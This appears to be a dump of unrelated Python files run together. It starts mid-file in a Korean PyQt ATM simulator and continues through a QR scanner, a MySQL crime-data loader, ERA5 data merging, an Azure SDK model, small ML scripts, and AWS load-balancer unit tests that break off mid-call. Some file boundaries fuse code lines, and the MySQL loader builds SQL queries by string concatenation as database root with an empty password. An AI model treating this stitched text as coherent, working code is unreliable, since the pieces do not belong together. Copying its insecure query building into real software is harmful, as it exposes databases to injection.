경우 newAccli에 "-" 추가 만약 i가 4 또는 9 또는 14가 아닐 경우 newAccli에 1부터 9까지의 랜덤 숫자 저장 입력한 나이값을 int형으로 형변환 하는 과정에서 문제가 발생했을 때 "나이를 잘못 입력하셨습니다"(이)라고 출력 만약 newAccli가 userTable에 'accNum'(이)라는 열에 없다면 ID라는 변수에 입력한 ID값을 인코딩 이때 발생한 key값과 value값을 각각 keyID, valueID로 저장 PW라는 변수에 입력한 PW값을 인코딩 이때 발생한 key값과 value값을 각각 keyPW, valuePW로 저장 userinformation이라는 변수 판다스 데이터프레임 함수를 이용하여 'Name' 열에는 valueID를, 'PW' 열에는 valuePW를, 'Money' 열에는 0을, 'Age' 열에는 입력한 나이값을, 'accNum' 열에는 newAccli를, 'keyID' 열에는 keyID를, 'keyPW' 열에는 keyPW을 저장 무한 반복문 종료 "회원가입에 성공했습니다."(이)라고 출력 """ def signup(self): msg = QMessageBox() global userTable if not self.lineEdit_ID.text() or not self.lineEdit_password.text() or not self.lineEdit_password_check.text() or not self.lineEdit_age.text(): msg.setText('정보를 모두 입력해주세요') msg.exec_() else: for i in range(len(userID)): if PWEncoding(self.lineEdit_ID.text()) in userID: msg.setText('이미 있는 아이디입니다.') msg.exec_() return if self.lineEdit_password.text() != self.lineEdit_password_check.text(): msg.setText('두 비밀번호가 일치하지 않습니다.') msg.exec_() return elif self.lineEdit_ID.text() not in Decoding(userID[i][1], userID[i][0]): try: lineEdit_age = int(self.lineEdit_age.text()) except: msg.setText('나이를 잘못 입력하셨습니다') msg.exec_() return newAccli = "" for i in range(3): newAccli += str(random.randint(1000, 9999)) + "-" newAccli += str(random.randint(1000, 9999)) if newAccli not in str(userTable['accNum']): ID = Encoding(self.lineEdit_ID.text()) PW = PWEncoding(self.lineEdit_password.text()) money = Encoding("0") userinformation = pd.DataFrame( [{'Name': ID[1], 'Pw': PW, 'Money': money[1], 'Age': lineEdit_age, 'Rate': 6, 'accNum': newAccli, 'keyID': ID[0], 'keyMoney': money[0]}]) userTable = pd.concat( [userTable, userinformation], ignore_index=True) msg.setText('회원가입에 성공했습니다.') msg.exec_() self.close() # 로그인 폼 class MainForm(QWidget): def __init__(self): super().__init__() self.setWindowTitle("Astro - ATM") self.resize(180, 500) layout = QGridLayout() toplayout = QHBoxLayout() # 조우식 잡다한버튼 button_login = QPushButton("로그아웃") button_login.clicked.connect(self.logout) layout.addWidget(button_login, 3, 1) layout.setRowMinimumHeight(2, 40) button_in = QPushButton("입금") button_in.setMaximumWidth(80) button_in.clicked.connect(self.inMoney) layout.addWidget(button_in, 1, 0) layout.setRowMinimumHeight(2, 40) button_out = QPushButton("출금") button_out.setMaximumWidth(80) button_out.clicked.connect(self.outMoney) layout.addWidget(button_out, 1, 1) layout.setRowMinimumHeight(2, 40) button_borrow = QPushButton("대출") button_borrow.setMaximumWidth(80) button_borrow.clicked.connect(self.loanMoney) layout.addWidget(button_borrow, 3, 0) layout.setRowMinimumHeight(2, 40) button_trans = QPushButton("이체") button_trans.setMaximumWidth(100) button_trans.setMaximumHeight(100) button_trans.setStyleSheet("background-color : #AADBDD;" "border-radius: 50%;" "width: 100px;" "height: 100px;") button_trans.clicked.connect(self.trans) toplayout.addWidget(button_trans) # layout.setRowMinimumHeight(2, 40) button_count = QPushButton("잔액조회") button_count.setMaximumWidth(80) button_count.clicked.connect(self.count) layout.addWidget(button_count, 2, 0) layout.setRowMinimumHeight(2, 40) button_creditrating = QPushButton("신용 조회") button_creditrating.setMaximumWidth(80) button_creditrating.clicked.connect(self.creditrating) layout.addWidget(button_creditrating, 2, 1) layout.setRowMinimumHeight(2, 40) mainlayout = QVBoxLayout() mainlayout.addLayout(toplayout) mainlayout.addLayout(layout) self.setLayout(mainlayout) # 로그아웃 시스템 def logout(self): global loginedLine, loginAction msg = QMessageBox() msg.setText("로그아웃되었습니다.") loginAction = False # 로그인 액션 초기화 loginedLine = -1 # 로그인라인 초기화 self.loginform = LoginForm() # 로그인 폼 self.loginform.setGeometry(QRect(100, 100, 500, 600)) self.loginform.show() # 로그인 폼 표시 self.close() # 메인폼 끄기 msg.exec_() """ # 이체 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 user는 inputAccNum에 상대방 계좌번호 입력 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 있다면 보낼 금액을 transMoney에 저장 transMoney가 int형으로 형변환 하는 과정에서 아무 문제도 발생하지 않았을 때 만약 transMoney가 user가 가진 금액보다 크다면 잔액이 부족하다고 출력 만약 transMoney가 이체 가능한 최소 비용보다 작다면 보내지 못한다고 출력 아무 문제가 없다면 userTable에 index만큼 반복 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 i번째 행 데이터와 같다면 반복문 탈출 userTable에 'Money'라는 열에 loginedLine번째 행 데이터를 userTable에 'Money'라는 열에 loginedLine번째 행 데이터 - transMoney로 저장 userTable에 'Money'라는 열에 i번째 행 데이터를 userTable에 'Money'라는 열에 i번째 행 데이터 + transMoney로 저장 DB폴더에 trans.log 파일을 만들고 이 파일을 file(이)라는 변수로 저장 이체할 때마다 돈을 보낸 사람 -> 돈을 받은 사람 : 금액 형식으로 저장 ex) 6852-2588-5453-1555->9532-6723-8939-7668:1233 "inputAccNum번호로 transMoney원 이체 완료했습니다."라고 출력 transMoney가 int형으로 형변환 하는 과정에서 valueError가 발생했을 때 "정확한 금액을 입력해주세요"(이)라고 출력 만약 inputAccNum이 userTable에 'accNum'(이)라는 열에 없다면 "해당 계좌는 존재하지 않습니다."(이)라고 출력 """ def trans(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: inputAccNum, dialog = QInputDialog.getText( self, 'Input Dialog', '보낼 사람의 계좌를 입력해주세요. :') if not inputAccNum: msg.setText("계좌번호를 정확히 입력해 주세요") msg.exec_() else: if inputAccNum in str(userTable['accNum']): transMoney, dialog1 = QInputDialog.getText( self, 'Input Dialog', '얼마를 보내시겠습니까? :') try: transMoney = int(transMoney) except: msg.setText("이체할 금액을 정확히 입력해 주세요") msg.exec_() return if transMoney > int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])): msg.setText("잔액이 부족합니다.") msg.exec_() elif transMoney < 100: msg.setText("이체 가능한 최소 비용은 100원입니다.") msg.exec_() else: for i in range(len(userTable.index)): if inputAccNum == userTable['accNum'].iloc[i]: break userTable['Money'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - transMoney))[1] userTable['keyMoney'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - transMoney))[0] userTable['Money'].iloc[i] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[i], userTable['Money'].iloc[i])) + transMoney))[1] userTable['keyMoney'].iloc[i] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[i], userTable['Money'].iloc[i])) + transMoney))[0] with open("DB/trans.log", "a", encoding="UTF8") as file: tmp = Encoding(str(transMoney)) res = uniqueEncode( userTable['accNum'].iloc[loginedLine], inputAccNum, tmp[0], tmp[1]) file.write(f"{res}\n") msg.setText( f"{inputAccNum}번호로 {transMoney}원 이체 완료했습니다.") msg.exec_() else: msg.setText("해당 계좌는 존재하지 않습니다.") msg.exec_() """ # LRU Cache를 이용한 잔액조회 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 userName을 userTable에 'Name'(이)라는 열, loginedLine번째 행 데이터를 저장 userMoney를 userTable에 'Money'(이)라는 열, loginedLine번째 행 데이터를 저장 만약 countCache.nodeMap에 userName이라는 key에 카운트가 3 이상이라면 countCache에 저장되어 있던 userName이라는 key에 value값을 출력 만약 countCache.nodeMap에 userName이라는 key에 카운트가 3 이상이 아니라면 userMoney 출력 countCache에 key가 userName이고, value가 userMoney인 값을 저장 """ def count(self): msg = QMessageBox() start = time.time() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: userName = userTable['Name'].iloc[loginedLine] countCache.put(userName, Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) if countCache.nodeMap.get(userName, [-1, 0])[1] >= 3: msg.setText( f"{str(countCache.get(userName))}원 있습니다.") print("Cache Count time :", time.time() - start) msg.exec_() else: time.sleep(1) msg.setText( f"{Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])}원 있습니다.") print("Count time :", time.time() - start) msg.exec_() """ # 출금 시스템 # 주석 추가 부탁 """ def outMoney(self): global userTable, loginedLine msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: outMoney, dialog = QInputDialog.getText( self, 'Input Dialog', '출금할 금액 :') if int(outMoney) > int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])): msg.setText("잔액이 부족합니다.") msg.exec_() else: enco = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) - int(outMoney))) userTable['Money'].iloc[loginedLine] = enco[1] userTable['keyMoney'].iloc[loginedLine] = enco[0] msg.setText(f"{outMoney}원을 출금 완료했습니다.") msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") msg.exec_() """ # 입금 시스템 로직: 만약 로그인이 안되어 있으면 로그인이 필요하다고 출력 만약 로그인이 되어 있으면 inMoney에 입금할 금액 저장 inMoney를 int형으로 형변환 하는 과정에서 아무 문제도 발생하지 않았을 때 userTable에 'Money'열, loginedLine번째 행 데이터에서 inMoney값을 더함 "입금 완료"(이)라고 출력 inMoney를 int형으로 형변환 하는 과정에서 valueError가 발생했을 때 "정확한 금액을 입력해주세요"(이)라고 출력 """ def inMoney(self): global userTable, loginedLine msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: inMoney, dialog = QInputDialog.getText( self, 'Input Dialog', '입금할 금액 :') enco = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(inMoney))) userTable['Money'].iloc[loginedLine] = enco[1] userTable['keyMoney'].iloc[loginedLine] = enco[0] msg.setText(inMoney + "원을 입금 완료했습니다.") msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") msg.exec_() """ # 대출 시스템 # 주석 추가 부탁 """ def loanMoney(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: try: loan, dialog = QInputDialog.getText( self, 'Input Dialog', '대출 금액 :') # userTable['Money'].iloc[loginedLine] += int(loan) userTable['Money'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(loan)))[1] userTable['keyMoney'].iloc[loginedLine] = Encoding(str(int(Decoding( userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine])) + int(loan)))[0] msg.setText(loan+"원 대출완료") msg.exec_() msg.setText("당신의 금리: %f" % userTable['Rate'].iloc[loginedLine]) msg.exec_() except ValueError: msg.setText("정확한 금액을 입력해주세요") msg.exec_() """ # 선형 회귀를 이용한 신용 등급 조회 시스템 # 주석 추가 부탁 """ def creditrating(self): msg = QMessageBox() if loginAction == False: msg.setText("로그인이 필요합니다.") msg.exec_() else: if lin.linear_regression(userTable, 'Age', 'keyMoney', 'Money', userTable['Age'].iloc[loginedLine], int(Decoding(userTable['keyMoney'].iloc[loginedLine], userTable['Money'].iloc[loginedLine]))) == 1: userTable['Rate'].iloc[loginedLine] = 2.8 msg.setText("당신의 신용등급은 높습니다.") msg.exec_() else: userTable['Rate'].iloc[loginedLine] = 4.8 msg.setText("당신의 신용등급은 낮습니다.") msg.exec_() if __name__ == '__main__': app = QApplication(sys.argv) form = LoginForm() form.show() sys.exit(app.exec_()) avyayjain/Python_ScriptsAutomation/QrScanner/QrScanner.py import cv2 ##import the module opencv import numpy as np ##import the module numpy import pyzbar.pyzbar as pyzbar ##import the module pyzbar img = cv2.imread("QR.png") ##read your image decode_QR = pyzbar.decode(img) ##function to decode QR for i in decode_QR: print("your scanned QR :",i.data) cv2.imshow("QR ", img) ##display Cropped image cv2.waitKey(0) crazysal/chemml __all__ = ["materials", "utilities"]def start(msg, bot, session): bot.send_message( msg.chat.id, "Hi, {0}.\nYou send: {1}".format(msg.chat.id, msg.text) ) return start AstrorEnales/CodeEval0 import sys lines = open(sys.argv[1], 'r') for line in lines: line = line.replace('\n', '').replace('\r', '') if len(line) > 0: n, m = [int(x) for x in line.split(',')] if m > n: print(n) else: intPart = n / m floatPart = n / float(m) diff = floatPart - intPart print(int(round(diff * m))) lines.close() import sys import xml.etree.ElementTree as ET import re import MySQLdb tree = ET.parse(sys.argv[1]) root = tree.getroot() db = MySQLdb.connect(host="localhost",user="root",passwd="",db="bitcamp1") cur = db.cursor() for child in root: obj = {} for items in child: obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] = items.text if(obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] is None): obj[items.tag[len("{http://dc.gov/dcstat/types/1.0/}"):]] = "null" time_division = obj["reportdatetime"].split("T") day_time = time_division[0].split("-") time_hour = time_division[1].split("-") query1 = ("Insert into CrimeLocation values (" + obj["neighborhoodcluster"] + "," + '"' + obj["district"] + '"' + "," + '"' + obj["block_group"] + '"' + "," + '"' + obj["ward"] + '"' + "," + '"' + obj["anc"] + '"' + "," + obj["blockxcoord"] + "," + obj["blockycoord"] + ");") query2 = ("Insert into ReportedCrimes values (" + obj["ccn"] + "," + '"' + obj["reportdatetime"] + '"' + "," + day_time[0] + "," + day_time[1] + "," + day_time[2] + "," + '"' + time_hour[0] + '"' + "," + '"' + time_hour[1] + '"' + "," + '"' + obj["shift"] + '"' + "," + '"' + obj["offense"] + '"' + "," + '"' + obj["method"] + '"' + "," + '"' + obj["lastmodifieddate"] + '"' + "," + '"' + obj["blocksiteaddress"] + '"' + "," + '"' + obj["businessimprovementdistrict"] + '"' + "," + obj["blockxcoord"] + "," + obj["blockycoord"] + "," + obj["psa"] + "," + obj["census_tract"] + "," + '"' + obj["voting_precinct"] + '"' + "," + '"' + obj["start_date"] + '"' + "," + '"' + obj["end_date"] + '"' + ");") #print query1 #print query2 try: cur.execute(query1) cur.execute(query2) db.commit() except: db.rollback() db.close() 0 import numpy as np import xarray as xr import pandas as pd from sys import argv from glob import glob scriptdir = '/uufs/chpc.utah.edu/common/home/u1070830/code/model-tools/era5/' profdir = '/uufs/chpc.utah.edu/common/home/u1070830/mewessler/era5/profiles/' lat, lon = argv[1:] lat, lon = float(lat), float(lon) flist = glob(profdir + 'disagg/' '*%s*%s*.nc'%(lat, abs(lon))) iso, sfc = [], [] for f in flist: d = xr.open_dataset(f) if 'level' in list(d.dims): iso.append(d.to_dataframe(#).drop(columns=['latitude', 'longitude'] ).reset_index().set_index(['time', 'level']).sort_index()) else: sfc.append(d.to_dataframe())#.drop(columns=['latitude', 'longitude'])) isomerge = None for i in range(1, len(iso)): print('Merging isobaric variable %d/%d'%(i, len(iso)-1)) if isomerge is not None: isomerge = isomerge.merge(iso[i], on=['time', 'level']) else: isomerge = iso[i-1].merge(iso[i], on=['time', 'level']) isomerge = isomerge[~isomerge.index.duplicated()] sfcmerge = None for i in range(1, len(sfc)): print('Merging surface variable %d/%d'%(i, len(sfc)-1)) if sfcmerge is not None: sfcmerge = sfcmerge.merge(sfc[i], on=['time']) else: sfcmerge = sfc[i-1].merge(sfc[i], on=['time']) sfcmerge = sfcmerge[~sfcmerge.index.duplicated()] sfcmerge = sfcmerge.rename( columns={k:k[-1] + k.replace('VAR_', '')[:-1] + 'M' for k in sfcmerge.keys() if 'VAR_' in k}) merge = xr.merge([isomerge.to_xarray(), sfcmerge.to_xarray()]) savestr = 'era5prof_%.2fN_%.2fW.nc'%(lat, abs(lon)) print('Saving: %s'%savestr) merge.to_netcdf(profdir + savestr) exit()import numpy as np from ml.model import NumberRecognizeNN from ml.data_processor import DataProcessor class ModelAPI(): def __init__(self, resource): self.resource = resource self.model = NumberRecognizeNN(resource.INPUT_SIZE, resource.OUTPUT_SIZE) resource.load_model(self.model) means, stds = resource.load_normalization_params() self.dp = DataProcessor(means, stds) def predict(self, data): _data = data if isinstance(data, (tuple, list)): _data = np.array([data], dtype=np.float32) f_data = self.dp.format_x(_data, size=self.resource.INPUT_SIZE) predicted = self.model(f_data) number = np.argmax(predicted.data, axis=1) return number # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from .proxy_only_resource_py3 import ProxyOnlyResource class SiteExtensionInfo(ProxyOnlyResource): """Site Extension Information. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Resource Id. :vartype id: str :ivar name: Resource Name. :vartype name: str :param kind: Kind of resource. :type kind: str :ivar type: Resource type. :vartype type: str :param extension_id: Site extension ID. :type extension_id: str :param title: :type title: str :param extension_type: Site extension type. Possible values include: 'Gallery', 'WebRoot' :type extension_type: str or ~azure.mgmt.web.models.SiteExtensionType :param summary: Summary description. :type summary: str :param description: Detailed description. :type description: str :param version: Version information. :type version: str :param extension_url: Extension URL. :type extension_url: str :param project_url: Project URL. :type project_url: str :param icon_url: Icon URL. :type icon_url: str :param license_url: License URL. :type license_url: str :param feed_url: Feed URL. :type feed_url: str :param authors: List of authors. :type authors: list[str] :param installer_command_line_params: Installer command line parameters. :type installer_command_line_params: str :param published_date_time: Published timestamp. :type published_date_time: datetime :param download_count: Count of downloads. :type download_count: int :param local_is_latest_version: true if the local version is the latest version; false otherwise. :type local_is_latest_version: bool :param local_path: Local path. :type local_path: str :param installed_date_time: Installed timestamp. :type installed_date_time: datetime :param provisioning_state: Provisioning state. :type provisioning_state: str :param comment: Site Extension comment. :type comment: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'kind': {'key': 'kind', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'extension_id': {'key': 'properties.extension_id', 'type': 'str'}, 'title': {'key': 'properties.title', 'type': 'str'}, 'extension_type': {'key': 'properties.extension_type', 'type': 'SiteExtensionType'}, 'summary': {'key': 'properties.summary', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'version': {'key': 'properties.version', 'type': 'str'}, 'extension_url': {'key': 'properties.extension_url', 'type': 'str'}, 'project_url': {'key': 'properties.project_url', 'type': 'str'}, 'icon_url': {'key': 'properties.icon_url', 'type': 'str'}, 'license_url': {'key': 'properties.license_url', 'type': 'str'}, 'feed_url': {'key': 'properties.feed_url', 'type': 'str'}, 'authors': {'key': 'properties.authors', 'type': '[str]'}, 'installer_command_line_params': {'key': 'properties.installer_command_line_params', 'type': 'str'}, 'published_date_time': {'key': 'properties.published_date_time', 'type': 'iso-8601'}, 'download_count': {'key': 'properties.download_count', 'type': 'int'}, 'local_is_latest_version': {'key': 'properties.local_is_latest_version', 'type': 'bool'}, 'local_path': {'key': 'properties.local_path', 'type': 'str'}, 'installed_date_time': {'key': 'properties.installed_date_time', 'type': 'iso-8601'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'comment': {'key': 'properties.comment', 'type': 'str'}, } def __init__(self, *, kind: str=None, extension_id: str=None, title: str=None, extension_type=None, summary: str=None, description: str=None, version: str=None, extension_url: str=None, project_url: str=None, icon_url: str=None, license_url: str=None, feed_url: str=None, authors=None, installer_command_line_params: str=None, published_date_time=None, download_count: int=None, local_is_latest_version: bool=None, local_path: str=None, installed_date_time=None, provisioning_state: str=None, comment: str=None, **kwargs) -> None: super(SiteExtensionInfo, self).__init__(kind=kind, **kwargs) self.extension_id = extension_id self.title = title self.extension_type = extension_type self.summary = summary self.description = description self.version = version self.extension_url = extension_url self.project_url = project_url self.icon_url = icon_url self.license_url = license_url self.feed_url = feed_url self.authors = authors self.installer_command_line_params = installer_command_line_params self.published_date_time = published_date_time self.download_count = download_count self.local_is_latest_version = local_is_latest_version self.local_path = local_path self.installed_date_time = installed_date_time self.provisioning_state = provisioning_state self.comment = comment machine_learning/decision_tree/decision_tree_credit_risk.py # -*- coding: utf-8 -*- import os, sys from os.path import dirname, join import pandas as pd sys.path.append(os.path.abspath(os.getcwd())) from sklearn.preprocessing import LabelEncoder from utils.formats import Formats from sklearn.tree import DecisionTreeClassifier, export_graphviz formats = Formats() df = pd.read_csv(formats.path_database("risco_credito.csv")) previsores = df.iloc[:, 0:4].values classe = df.iloc[:, 4].values # Árvores de decisão não podem ser categoricos labelencoder = LabelEncoder() previsores[:, 0] = labelencoder.fit_transform(previsores[:, 0]) previsores[:, 1] = labelencoder.fit_transform(previsores[:, 1]) previsores[:, 2] = labelencoder.fit_transform(previsores[:, 2]) previsores[:, 3] = labelencoder.fit_transform(previsores[:, 3]) decisionTree = DecisionTreeClassifier(criterion="entropy") """ Attributes ----------- feature_importances_ : classificar a importância de cada atributo Methods ------- export_graphviz : dot_data : string representação gráfica da árvore de decisção """ decisionTree = decisionTree.fit(previsores, classe) # export_graphviz( # decisionTree, # out_file=os.path.abspath(join(dirname(os.getcwd()), 'python/tree_credit_risk.dot')), # feature_names=["historia", "divida", "garantias", "renda"], # class_names=["alto", "moderado", "baixo"], # filled=True, # leaves_parallel=True, # ) result = decisionTree.predict([[0, 0, 1, 2], [3, 0, 0, 0]]) print(result)0 from abc import ABC, abstractmethod from .dataset_info import BaseDatasetInfo class BaseDataset(ABC): def __init__(self, dataset_info: BaseDatasetInfo): self.dataset_info = dataset_info def __getitem__(self, idx): """ iterate through the dataset Args: idx: can be a single index or range Returns: requested sample(s) """ if isinstance(idx, int): if idx >= self.__len__(): raise IndexError return self._get_single_item(idx) stop = min(self.__len__(), idx.stop) return [self.__getitem__(i) for i in range(idx.start, stop, idx.step)] if idx.step else [self.__getitem__(i) for i in range(idx.start, stop)] @property @abstractmethod def labels(self): pass @abstractmethod def __len__(self): pass @abstractmethod def _get_single_item(self, index): pass @abstractmethod def close(self): """ release resources """ pass Aerex/GamestonkTerminal """ CNN View """ __docformat__ = "numpy" import os import matplotlib.pyplot as plt from pandas.plotting import register_matplotlib_converters from gamestonk_terminal import feature_flags as gtff from gamestonk_terminal.config_plot import PLOT_DPI from gamestonk_terminal.economy import cnn_model from gamestonk_terminal.helper_funcs import plot_autoscale, export_data register_matplotlib_converters() def fear_and_greed_index(indicator: str, export: str): """Display CNN Fear And Greed Index. [Source: CNN Business] Parameters ---------- indicator : str CNN Fear And Greed indicator or index. From Junk Bond Demand, Market Volatility, Put and Call Options, Market Momentum Stock Price Strength, Stock Price Breadth, Safe Heaven Demand, and Index. export : str Export plot to png,jpg,pdf file """ fig = plt.figure(figsize=plot_autoscale(), dpi=PLOT_DPI) report, im = cnn_model.get_feargreed_report(indicator, fig) print(report) if indicator: plt.imshow(im) export_data( export, os.path.dirname(os.path.abspath(__file__)), "feargreed", ) if gtff.USE_ION: plt.ion() plt.show() from moviepy.editor import concatenate_videoclips, VideoFileClip, AudioFileClip, CompositeAudioClip, concatenate_audioclips class Convert: def __init__(self, videoClips): self.video = VideoFileClip(videoClips) self.constIphone = VideoFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp4") self.audio = AudioFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp3") def __repr__(self): return f"" def Merge(self, OutPut): merged = concatenate_videoclips([self.video, self.constIphone.resize(self.video.size)]) mixaudio = CompositeAudioClip([ self.audio.subclip(0, audio1:=(self.audio.duration-self.constIphone.duration)+1), self.video.audio.subclip(audio2:=self.video.duration-audio1) ]) if self.video.duration-audio1 < 0: self.audio = AudioFileClip("/".join(__file__.split("/")[:-1])+"/iphone.mp3").subclip(audio1-self.video.duration) mixaudio = CompositeAudioClip([ self.audio.subclip(0, audio1:=(self.audio.duration-self.constIphone.duration)+1), self.video.audio.subclip(audio2:=self.video.duration-audio1) ]) merged.audio=concatenate_audioclips([ self.video.audio.subclip(0, audio2), mixaudio, self.audio.subclip(audio1) ]) merged.write_videofile(OutPut, threads=10) import logging from elb_load_monitor.alb_alarm_messages import ALBAlarmEvent from elb_load_monitor.alb_alarm_messages import ALBAlarmAction from elb_load_monitor.alb_alarm_messages import ALBAlarmStatusMessage from elb_load_monitor.alb_alarm_messages import CWAlarmState from elb_load_monitor.alb_listener_rules_handler import ALBListenerRulesHandler from unittest.mock import ANY, MagicMock import json import pathlib import unittest logger = logging.getLogger() logger.setLevel(logging.DEBUG) class TestALBListenerRulesHandler(unittest.TestCase): def setUp(self) -> None: self.elbv2_client = MagicMock() alb_listener_json = open(pathlib.Path( __file__).parent/'test_alb_listener.json', 'r') self.elbv2_client.describe_rules = MagicMock( return_value=json.loads(alb_listener_json.read())) alb_listener_json.close() self.cw_client_in_alarm = MagicMock() cw_in_alarm_json = open(pathlib.Path( __file__).parent/'test_cw_in_alarm.json', 'r') self.cw_client_in_alarm.describe_alarms = MagicMock( return_value=json.loads(cw_in_alarm_json.read())) cw_in_alarm_json.close() self.cw_client_ok = MagicMock() cw_ok_json = open(pathlib.Path(__file__).parent/'test_cw_ok.json', 'r') self.cw_client_ok.describe_alarms = MagicMock( return_value=json.loads(cw_ok_json.read())) cw_ok_json.close() self.cw_alarm_arn = 'arn:aws:cloudwatch:us-east-1:817387504538:alarm:ALB_test' self.cw_alarm_name = 'ALB_test' self.load_balancer_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:loadbalancer/app/AgentPortalALB/bb6bb42b08f94c0b' self.elb_listener_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:listener/app/AgentPortalALB/bb6bb42b08f94c0b/b3784a6b090b3696' self.elb_listener_rule_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:listener-rule/app/AgentPortalALB/bb6bb42b08f94c0b/b3784a6b090b3696/9758a586f4921acf' self.target_group_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:targetgroup/AppServerATG/090a4ba28ada9d48' self.secondary_target_group_arn = 'arn:aws:elasticloadbalancing:us-east-1:817387504538:targetgroup/TestGroup/1566e30628006197' self.elb_shed_percent = 20 self.max_elb_shed_percent = 100 self.elb_restore_percent = 10 self.shed_mesg_delay_sec = 60 self.restore_mesg_delay_sec = 120 self.sqs_queue_url = 'test_queue_url' return def test_handle_alarm(self) -> None: alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.ALARM) sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, self.max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.SHED) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 80) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) message_body = { 'albAlarmAction': 'SHED', 'alarmArn': alb_alarm_event.alarm_arn, 'alarmName': alb_alarm_event.alarm_name, 'elbListenerArn': self.elb_listener_arn, 'elbShedPercent': self.elb_shed_percent, 'maxElbShedPercent': self.max_elb_shed_percent, 'elbRestorePercent': self.elb_restore_percent, 'loadBalancerArn': self.load_balancer_arn, 'sqsQueueURL': self.sqs_queue_url, 'shedMesgDelaySec': self.shed_mesg_delay_sec, 'restoreMesgDelaySec': self.restore_mesg_delay_sec, 'targetGroupArn': self.target_group_arn } sqs_client.send_message.assert_called_with( QueueUrl=self.sqs_queue_url, DelaySeconds=self.shed_mesg_delay_sec, MessageBody=json.dumps(message_body)) return def test_handle_alarm_single_shed(self) -> None: alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.ALARM) sqs_client = MagicMock() elb_shed_percent = 20 max_elb_shed_percent = 10 alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, elb_shed_percent, max_elb_shed_percent, self.elb_restore_percent, self.shed_mesg_delay_sec, self.restore_mesg_delay_sec) alarm_action = alb_listener_rules_handler.handle_alarm( self.elbv2_client, sqs_client, self.sqs_queue_url, alb_alarm_event) self.assertEqual(alarm_action, ALBAlarmAction.NONE) self.assertEqual(len(alb_listener_rules_handler.elb_rules), 2) self.assertEqual( alb_listener_rules_handler.elb_rules[0].forward_configs.get(self.target_group_arn), 90) self.elbv2_client.modify_rule.assert_called_with( RuleArn=self.elb_listener_rule_arn, Actions=ANY) sqs_client.send_message.assert_not_called() return def test_handle_alarm_other_states(self) -> None: # No other alarm event is expected and thus no actions should be taken alb_alarm_event = ALBAlarmEvent( alarm_event_id='some_id', alarm_arn=self.cw_alarm_arn, alarm_name=self.cw_alarm_name, cw_alarm_state=CWAlarmState.OK) sqs_client = MagicMock() alb_listener_rules_handler = ALBListenerRulesHandler( self.elbv2_client, self.load_balancer_arn, self.elb_listener_arn, self.target_group_arn, self.elb_shed_percent, 